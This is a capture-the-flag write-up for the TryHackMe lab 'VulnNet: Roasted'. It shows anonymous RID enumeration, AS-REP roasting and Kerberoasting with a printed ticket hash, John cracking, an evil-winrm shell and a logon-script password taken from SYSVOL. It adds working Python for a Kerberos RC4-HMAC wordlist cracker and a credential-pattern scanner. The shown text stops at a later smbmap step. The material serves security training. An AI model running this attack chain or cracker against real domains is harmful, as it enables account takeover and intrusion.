THM Writeup – VulnNet: Roasted


VulnNet: Roasted

VulnNet Entertainment quickly deployed another management instance on their very broad network…

Room: VulnNet: Roasted

Difficulty: Easy

Operating System: Windows

Author: SkyWaves

VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they, as always, hired you to perform a penetration test and see how the system administrators are performing.

This is a much simpler machine; do not overthink it. You can do it by following common methodologies.

Add the IP address to your hosts file:

echo '10.10.202.234    roasted.thm' >> /etc/hosts

Scan the target machine – find open ports first (the long option is --min-rate; nmap tolerates the single-dash spelling but it is easy to mistype):

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv roasted.thm

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 128
88/tcp    open  kerberos-sec     syn-ack ttl 128
135/tcp   open  msrpc            syn-ack ttl 128
139/tcp   open  netbios-ssn      syn-ack ttl 128
389/tcp   open  ldap             syn-ack ttl 128
445/tcp   open  microsoft-ds     syn-ack ttl 128
464/tcp   open  kpasswd5         syn-ack ttl 128
593/tcp   open  http-rpc-epmap   syn-ack ttl 128
636/tcp   open  ldapssl          syn-ack ttl 128
3268/tcp  open  globalcatLDAP    syn-ack ttl 128
3269/tcp  open  globalcatLDAPssl syn-ack ttl 128
5985/tcp  open  wsman            syn-ack ttl 128
9389/tcp  open  adws             syn-ack ttl 128
49665/tcp open  unknown          syn-ack ttl 128
49668/tcp open  unknown          syn-ack ttl 128
49669/tcp open  unknown          syn-ack ttl 128
49670/tcp open  unknown          syn-ack ttl 128
49677/tcp open  unknown          syn-ack ttl 128
49690/tcp open  unknown          syn-ack ttl 128
49706/tcp open  unknown          syn-ack ttl 128

Get more details about open ports:

nmap -T4 -A -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49665,49668-49670,49677,49690,49706 roasted.thm

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-10 07:22:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC

Enumerate SMB – first, download enum4linux and make it executable:

root@ip-10-10-185-72:~# wget https://raw.githubusercontent.com/CiscoCXSecurity/enum4linux/master/enum4linux.pl
chmod +x enum4linux.pl

List shares:

root@ip-10-10-185-72:~# ./enum4linux.pl -S roasted.thm

WARNING: polenum is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 11 07:12:05 2022

 =========================================( Target Information )=========================================

Target ........... roasted.thm
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on roasted.thm )============================


[+] Got domain/workgroup name: VULNNET-RST


 ====================================( Session Check on roasted.thm )====================================


[+] Server roasted.thm allows sessions using username '', password ''


 =================================( Getting domain SID for roasted.thm )=================================

Domain Name: VULNNET-RST
Domain Sid: S-1-5-21-1589833671-435344116-4136949213

[+] Host is part of a domain (not a workgroup)


 ==================================( Share Enumeration on roasted.thm )==================================

WARNING: The "syslog" option is deprecated
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[roasted.thm]

    Sharename       Type      Comment
    ---------       ----      -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to roasted.thm failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on roasted.thm

As we can see, this version of the tool could not list the shares: the server rejects the SMB1 fallback it uses for the browse list. We have to use another tool.

Let’s try smbmap – locate the installation path, change into it and list its contents:

root@ip-10-10-185-72:~# locate smbmap
/opt/smbmap
/opt/smbmap/LICENSE
/opt/smbmap/README.md
/opt/smbmap/psutils
/opt/smbmap/requirements.txt
/opt/smbmap/smbmap.py
/opt/smbmap/psutils/Get-FileLockProcess.ps1
/root/Desktop/Tools/Miscellaneous/smbmap
root@ip-10-10-19-31:~# cd /opt/smbmap/
root@ip-10-10-19-31:/opt/smbmap# ls
LICENSE  psutils  README.md  requirements.txt  smbmap.py

Run smbmap against our target machine:

root@ip-10-10-185-72:/opt/smbmap# ./smbmap.py -H roasted.thm -u anonymous

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                     https://github.com/ShawnDEvans/smbmap

                                                                                                    
[+] IP: roasted.thm:445	Name: unknown             	Status: Guest session   
        Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    IPC$                                              	READ ONLY	Remote IPC
    NETLOGON                                          	NO ACCESS	Logon server share 
    SYSVOL                                            	NO ACCESS	Logon server share 
    VulnNet-Business-Anonymous                        	READ ONLY	VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous                      	READ ONLY	VulnNet Enterprise Sharing

As an anonymous user we have read access to IPC$. That share exposes the named pipes (lsarpc, samr) behind a null session, which is enough to enumerate domain accounts even though every data share is locked down.

We’re going to use Impacket, so install it if you don’t have it already.

Enumerate domain accounts by brute-forcing RIDs through the lsarpc pipe (press Enter at the password prompt to use a null session):

root@ip-10-10-185-72:~# python3 /opt/impacket/examples/lookupsid.py anonymous@roasted.thm

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at roasted.thm
[*] StringBinding ncacn_np:roasted.thm[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Add all SidTypeUsers to a file named e.g. users.txt:

Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
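Copying the SidTypeUser names out of the lookupsid output by hand is fine for a dozen accounts; the parser below, an added example that is not part of the original writeup, does the same from the text and writes users.txt. An excerpt of the lookupsid output above is embedded so it runs offline. By default it drops machine accounts (names ending in $), which the writeup kept; they are not useful roasting or spraying targets, and include_machines=True keeps them.

```python
import re
from typing import Iterable, List, Tuple

# Excerpt of the lookupsid.py output shown above (copied from the page) so the
# parser runs offline; the real run lists many more groups and aliases.
SAMPLE_OUTPUT = """\
[*] Brute forcing SIDs at roasted.thm
[*] StringBinding ncacn_np:roasted.thm[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\\Administrator (SidTypeUser)
501: VULNNET-RST\\Guest (SidTypeUser)
502: VULNNET-RST\\krbtgt (SidTypeUser)
512: VULNNET-RST\\Domain Admins (SidTypeGroup)
1000: VULNNET-RST\\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\\DnsAdmins (SidTypeAlias)
1104: VULNNET-RST\\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\\a-whitehat (SidTypeUser)
1109: VULNNET-RST\\t-skid (SidTypeUser)
1110: VULNNET-RST\\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\\j-leet (SidTypeUser)
"""

# One result line: "<rid>: <DOMAIN>\<name> (<SidType...>)".  Names may contain
# spaces, so the name group is non-greedy and anchored on the trailing type.
ENTRY_RE = re.compile(r"^\s*(\d+):\s+([^\\\s]+)\\(.+?)\s+\((SidType\w+)\)\s*$")
SID_RE = re.compile(r"Domain SID is:\s*(S-1-5-21-\d+-\d+-\d+)")


def parse_lookupsid(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (rid, domain, name, sidtype) for every resolved SID in the output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            rid, domain, name, sidtype = m.groups()
            entries.append((int(rid), domain, name, sidtype))
    return entries


def domain_sid(text: str):
    """The domain SID printed before the RID table, or None if absent."""
    m = SID_RE.search(text)
    return m.group(1) if m else None


def user_accounts(entries, include_machines: bool = False) -> List[str]:
    """Names of SidTypeUser entries, in RID order; machine accounts (trailing '$')
    are skipped unless asked for, since they cannot be roasted or sprayed usefully."""
    return [name for _, _, name, sidtype in entries
            if sidtype == "SidTypeUser" and (include_machines or not name.endswith("$"))]


def write_users_file(path: str, names: Iterable[str]) -> int:
    """Write one name per line (the format GetNPUsers.py -usersfile expects); returns the count."""
    names = list(names)
    with open(path, "w") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    entries = parse_lookupsid(SAMPLE_OUTPUT)
    users = user_accounts(entries)
    print("domain SID:", domain_sid(SAMPLE_OUTPUT))
    print(write_users_file("users.txt", users), "users written to users.txt:", users)
```

On a real run, pipe the full lookupsid output into this instead of the embedded excerpt; the Domain SID line is worth keeping because it doubles as a sanity check that you enumerated the right domain.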

Check for AS-REP roastable accounts. For each user, GetNPUsers.py asks the KDC for a TGT without pre-authentication; an account with “Do not require Kerberos preauthentication” set gets an AS-REP back whose encrypted part is keyed with that user’s NT hash, so it can be cracked offline:

root@ip-10-10-185-72:~# python3 /opt/impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile users.txt -no-pass -dc-ip roasted.thm

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:85cd62d1371ebf288b277e8255421dd2$e2d90c8a04550ab234e8951fd6bef1d5cbe5536c6b51d3d921c017154aba56d0675e571733b67b5e15c31281940c3d8c28b84b244a59fbad878aaa112395881e0f9b35c1850cd8dc96c25f4d96467d3e7d6706d42adbe2dc5cf439279fd297e7baeff4ced7eda3d26442e922a6665126b179ab43334d2fcab21440986136d441fa7380811114ccd493549a9fc2a4b7015d7e73d197e86fc028abdd2309b1bd60100d83b51fd825febee303697888dddb7178032fe1d853a74c5354e1c370aa3a62b4cc1dae74525e30141ee9e9ced48f00f4347e23dc3a4cc50c1783d18efe0d88e141ea9db917723981f7e9812f72a3
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

Only t-skid has pre-authentication disabled; the KDC_ERR_CLIENT_REVOKED response belongs to krbtgt, which is disabled by default. Add the hash to a file named e.g. hash.txt

And crack it:

root@ip-10-10-185-72:~# john -w:/usr/share/wordlists/rockyou.txt hash.txt

Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]        (?)

Now we know the password for user t-skid. That alone does not give us a shell, but any authenticated domain account can ask the KDC for service tickets, which is all Kerberoasting needs.

Kerberoast: request a service ticket for every account that has an SPN and write the ticket hashes to kerberos.hash. The ticket’s encrypted part is keyed with the service account’s NT hash, so it can be cracked offline just like the AS-REP:

root@ip-10-10-185-72:~# python3 /opt/impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:[REDACTED]' -outputfile kerberos.hash -dc-ip roasted.thm

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName    Name                MemberOf                                                       PasswordLastSet             LastLogon                   Delegation 
----------------------  ------------------  -------------------------------------------------------------  --------------------------  --------------------------  ----------
CIFS/vulnnet-rst.local  enterprise-core-vn  CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local  2021-03-11 19:45:09.913979  2021-03-13 23:41:17.987528

Crack the TGS hash (etype 23, so the key is the service account’s NT hash):

root@ip-10-10-185-72:~# john -w:/usr/share/wordlists/rockyou.txt kerberos.hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]   (?)
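The two cracking steps above (the AS-REP hash for t-skid and the TGS hash for enterprise-core-vn) test each candidate password the same way, and the example below, added here and not part of the original writeup, shows what John does per candidate: derive the NT hash (MD4 over the UTF-16LE password), derive the RFC 4757 usage key, RC4-decrypt the ciphertext and check the HMAC-MD5 checksum. It goes slightly beyond the writeup by handling both the krb5asrep and krb5tgs line formats. The account svc-demo, the realm EXAMPLE.LOCAL, the password Summer2021! and the plaintext bytes are constructed for the demonstration; only the Python standard library is used, with MD4 re-implemented because many OpenSSL 3 builds refuse hashlib.new("md4").

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for j, i in enumerate(order):
                a = rol((a + fn(b, c, d) + X[i] + k) & MASK, shifts[j % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates old d
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def usage_key(key: bytes, usage: int) -> bytes:
    """RFC 4757: K1 = HMAC-MD5(K, key usage as little-endian uint32)."""
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None):
    """(checksum, ciphertext) over confounder||plaintext, RFC 4757 section 6."""
    k1 = usage_key(key, usage)
    data = (confounder or os.urandom(8)) + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def rc4hmac_decrypt(key: bytes, usage: int, checksum: bytes, ciphertext: bytes):
    """Plaintext with the confounder stripped, or None when the key is wrong:
    the HMAC over the decrypted bytes then no longer matches the checksum."""
    k1 = usage_key(key, usage)
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, ciphertext)
    ok = hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)
    return data[8:] if ok else None


# Key usage per format: Windows encrypts the AS-REP enc-part under usage 8 (not
# RFC 4120's 3); the enc-part of a service ticket uses usage 2.
FORMATS = {"$krb5asrep$23$": 8, "$krb5tgs$23$": 2}


def parse_roast_line(line: str):
    """$krb5asrep$23$user@REALM:cks$edata or $krb5tgs$23$*user$REALM$spn*$cks$edata
    -> (usage, checksum bytes, ciphertext bytes)."""
    for prefix, usage in FORMATS.items():
        if line.startswith(prefix):
            tail = line[len(prefix):].split(":" if usage == 8 else "*$", 1)[1]
            cks_hex, edata_hex = tail.split("$", 1)
            if len(cks_hex) != 32:
                raise ValueError("checksum field must be 16 bytes of hex")
            return usage, bytes.fromhex(cks_hex), bytes.fromhex(edata_hex)
    raise ValueError("not an etype-23 AS-REP/TGS line")


def crack(line: str, candidates):
    """Wordlist attack: the first candidate whose NT hash verifies the checksum."""
    usage, checksum, edata = parse_roast_line(line)
    for pw in candidates:
        if rc4hmac_decrypt(nt_hash(pw), usage, checksum, edata) is not None:
            return pw
    return None


# CONSTRUCTED samples: hypothetical account and password, fixed confounder so the
# lines are reproducible.  A real enc-part is DER-encoded ASN.1; any bytes do here.
SAMPLE_PASSWORD = "Summer2021!"
SAMPLE_CONFOUNDER = bytes(range(8))
SAMPLE_PLAINTEXT = b"constructed EncASRepPart/EncTicketPart bytes"


def sample_line(kind: str = "asrep") -> str:
    usage = 8 if kind == "asrep" else 2
    cks, edata = rc4hmac_encrypt(nt_hash(SAMPLE_PASSWORD), usage, SAMPLE_PLAINTEXT, SAMPLE_CONFOUNDER)
    if kind == "asrep":
        return f"$krb5asrep$23$svc-demo@EXAMPLE.LOCAL:{cks.hex()}${edata.hex()}"
    return f"$krb5tgs$23$*svc-demo$EXAMPLE.LOCAL$CIFS/dc.example.local*${cks.hex()}${edata.hex()}"
```

John and hashcat (modes 18200 and 13100) do exactly this per candidate, only far faster; the check fails closed, because a wrong password decrypts to bytes whose HMAC-MD5 does not match the transmitted checksum. The Guest line in the secretsdump output further down, 31d6cfe0d16ae931b73c59d7e0c089c0, is nt_hash("") and makes a handy sanity check for the MD4 routine.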

We’ve just recovered the password for user enterprise-core-vn. That account is a member of Remote Management Users (see the MemberOf column above) and WinRM is open on 5985, so it gives us a shell.

Log in as user enterprise-core-vn:

root@ip-10-10-185-72:~# evil-winrm -u 'enterprise-core-vn' -p '[REDACTED]' -i roasted.thm

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents>

Find the user flag and read it:

*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> cd ..
*Evil-WinRM* PS C:\Users\enterprise-core-vn> cd Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> dir


    Directory: C:\Users\enterprise-core-vn\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt


*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> more user.txt
THM{[REDACTED]}

Enumerate SMB again, this time with the username and password we found:

root@ip-10-10-185-72:/opt/smbmap# ./smbmap.py -H roasted.thm -u 'enterprise-core-vn' -p '[REDACTED]'


    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                     https://github.com/ShawnDEvans/smbmap

                                                                                                    
[+] IP: roasted.thm:445	Name: unknown             	Status: Authenticated
        Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    ADMIN$                                            	NO ACCESS	Remote Admin
    C$                                                	NO ACCESS	Default share
    IPC$                                              	READ ONLY	Remote IPC
    NETLOGON                                          	READ ONLY	Logon server share 
    SYSVOL                                            	READ ONLY	Logon server share 
    VulnNet-Business-Anonymous                        	READ ONLY	VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous                      	READ ONLY	VulnNet Enterprise Sharing

NETLOGON and SYSVOL are now readable. SYSVOL holds the domain’s Group Policy objects and logon scripts and is readable by every authenticated domain user, which makes it a classic place to find hard-coded credentials.

Connect to SYSVOL and look for anything interesting:

root@ip-10-10-185-72:~# smbclient //roasted.thm/SYSVOL --user=enterprise-core-vn%[REDACTED]

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 11 19:19:49 2021
  ..                                  D        0  Thu Mar 11 19:19:49 2021
  vulnnet-rst.local                   D        0  Thu Mar 11 19:19:49 2021

        8771839 blocks of size 4096. 4555302 blocks available
smb: \> cd vulnnet-rst.local
smb: \vulnnet-rst.local\> ls
  .                                   D        0  Thu Mar 11 19:23:40 2021
  ..                                  D        0  Thu Mar 11 19:23:40 2021
  DfsrPrivate                       DHS        0  Thu Mar 11 19:23:40 2021
  Policies                            D        0  Thu Mar 11 19:20:26 2021
  scripts                             D        0  Tue Mar 16 23:15:49 2021

        8771839 blocks of size 4096. 4555302 blocks available
smb: \vulnnet-rst.local\> cd scripts
smb: \vulnnet-rst.local\scripts\> ls
  .                                   D        0  Tue Mar 16 23:15:49 2021
  ..                                  D        0  Tue Mar 16 23:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 23:18:14 2021

        8771839 blocks of size 4096. 4555295 blocks available
smb: \vulnnet-rst.local\scripts\> get ResetPassword.vbs
getting file \vulnnet-rst.local\scripts\ResetPassword.vbs of size 2821 as ResetPassword.vbs (9.5 KiloBytes/sec) (average 9.5 KiloBytes/sec)

We found and downloaded an interesting file: a password-reset script sitting in the domain-wide scripts folder.

See the file content:

root@ip-10-10-185-72:~# cat ResetPassword.vbs 
Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "[REDACTED]"
...

We found credentials for user a-whitehat hard-coded in a domain logon script.
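A single scripts folder is easy to read by eye, but SYSVOL on a real domain holds hundreds of files. The scanner below, added here and not part of the original writeup, walks a local copy of SYSVOL (for instance one pulled down with smbclient’s recurse/mget) and flags lines that look like embedded credentials. The strPassword assignment is the exact shape found above; the net use and ConvertTo-SecureString patterns, the file-extension list, and the sample tree built in a temporary directory (including the password Constructed-Pa55! and the UTF-16 batch file) are assumptions added for the demonstration.

```python
import os
import re
import tempfile
from typing import List, Tuple

SCRIPT_EXTENSIONS = {".vbs", ".bat", ".cmd", ".ps1", ".js", ".txt", ".ini"}

# (label, regex), matched per line.  The whole line is reported so the analyst
# sees the context; the matching username assignment is usually adjacent.
PATTERNS = [
    ("script_assignment", re.compile(r'\b\w*(?:pass|pwd|secret)\w*\s*=\s*"[^"]+"', re.I)),
    ("net_use_credential", re.compile(r"\bnet\s+use\b.*\s/user:\S+", re.I)),
    ("powershell_plaintext", re.compile(r"ConvertTo-SecureString\s+.*-AsPlainText", re.I)),
]

Finding = Tuple[str, str, int, str]  # relative path, label, line number, line


def read_text(path: str) -> str:
    raw = open(path, "rb").read()
    # Scripts saved by Windows tools are often UTF-16 with a BOM; decoding them
    # as UTF-8 would interleave NULs between the letters and defeat the regexes.
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="ignore")
    return raw.decode("utf-8", errors="ignore")


def scan_file(path: str, rel: str) -> List[Finding]:
    findings = []
    for lineno, line in enumerate(read_text(path).splitlines(), 1):
        for label, rx in PATTERNS:
            if rx.search(line):
                findings.append((rel, label, lineno, line.strip()))
                break  # one finding per line is enough
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Scan every script-like file under root (a local copy of SYSVOL)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.extend(scan_file(full, rel))
    return findings


# CONSTRUCTED sample tree mirroring the SYSVOL layout seen above.
SAMPLE_FILES = {
    # Same shape as the ResetPassword.vbs found in SYSVOL\<domain>\scripts,
    # with a constructed password in place of the real one.
    "vulnnet-rst.local/scripts/ResetPassword.vbs":
        'Option Explicit\n\nDim strUserNTName, strPassword\n'
        'strUserNTName = "a-whitehat"\nstrPassword = "Constructed-Pa55!"\n',
    # Constructed drive-mapping script, written as UTF-16 like many Windows editors do.
    "vulnnet-rst.local/scripts/map.bat":
        "@echo off\r\nnet use H: \\\\fs01\\home Constructed-Pa55! /user:VULNNET-RST\\svc-map\r\n",
    # Constructed benign script: no credential, must not be reported.
    "vulnnet-rst.local/scripts/cleanup.ps1":
        "Get-ChildItem $env:TEMP | Remove-Item -Recurse -Force\n",
}


def build_sample_sysvol(root: str) -> None:
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        data = content.encode("utf-16") if rel.endswith(".bat") else content.encode("utf-8")
        with open(full, "wb") as fh:
            fh.write(data)


def demo_scan() -> List[Finding]:
    """Build the constructed tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_sysvol(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, label, lineno, line in demo_scan():
        print(f"{rel}:{lineno} [{label}] {line}")
```

Point scan_tree at the directory you mirrored SYSVOL into and triage the hits by hand; the regexes are deliberately loose, since a false positive costs seconds while a missed logon-script password costs the domain.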

Enumerate SMB once again, with the new credentials:

root@ip-10-10-185-72:/opt/smbmap# ./smbmap.py -H roasted.thm -u 'a-whitehat' -p '[REDACTED]'

